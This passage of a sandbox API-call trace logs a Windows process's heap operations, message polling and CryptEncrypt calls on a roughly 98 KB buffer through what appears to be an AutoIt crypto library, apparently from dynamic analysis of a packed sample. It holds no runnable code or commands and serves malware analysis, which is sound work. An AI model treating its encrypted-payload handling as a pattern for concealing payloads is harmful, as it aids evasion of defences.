hHeap=0x770000) returned 1 [0039.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0039.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0039.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0039.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0039.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0039.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0039.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0039.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0039.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0039.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0039.391] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0039.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0039.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0039.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0039.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0039.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0039.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0039.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0039.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0039.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0039.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0039.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0039.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0039.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0039.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0039.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0039.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0039.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0039.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0039.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0039.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0039.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0039.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0039.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0039.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0039.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0039.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0039.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0039.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0039.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0039.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0x7ae928 [0039.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x7ae928, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0039.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0039.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0039.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.393] GetProcAddress (hModule=0x754b0000, lpProcName="CryptGetKeyParam") returned 0x754d77cb [0039.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0039.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0039.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0039.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0039.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0039.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0039.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0039.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0039.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0039.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0039.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0039.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0039.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0039.394] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da298, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da298*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0039.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0039.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0039.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0039.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0039.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0039.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0039.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0039.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0039.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0039.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0039.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0039.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0039.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0039.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0039.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0039.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0039.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0039.395] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.395] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.395] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.395] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.395] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.395] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.395] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.395] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.395] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0039.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.395] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.395] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.396] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.396] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.396] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.396] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.396] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.396] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0039.396] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.396] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.396] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.396] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.396] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.396] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0039.396] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.397] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.397] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1801b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x18020) returned 1 [0039.397] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.397] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.397] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.397] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.397] CharLowerBuffW (in: lpsz="byte[98337]", cchLength=0xb | out: lpsz="byte[98337]") returned 0xb [0039.397] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.400] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.400] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.400] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.402] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.402] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x965058*, pdwDataLen=0x6ae220*=0x1801b, dwBufLen=0x18020 | out: pbData=0x965058*, pdwDataLen=0x6ae220*=0x18020) returned 1 [0039.403] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.403] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0039.403] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.405] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.406] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.406] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.406] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0039.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0039.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.406] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.406] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0039.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0039.406] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.406] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0039.406] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.406] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.406] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.406] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.406] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0039.406] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.414] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.414] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.414] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.420] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.420] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 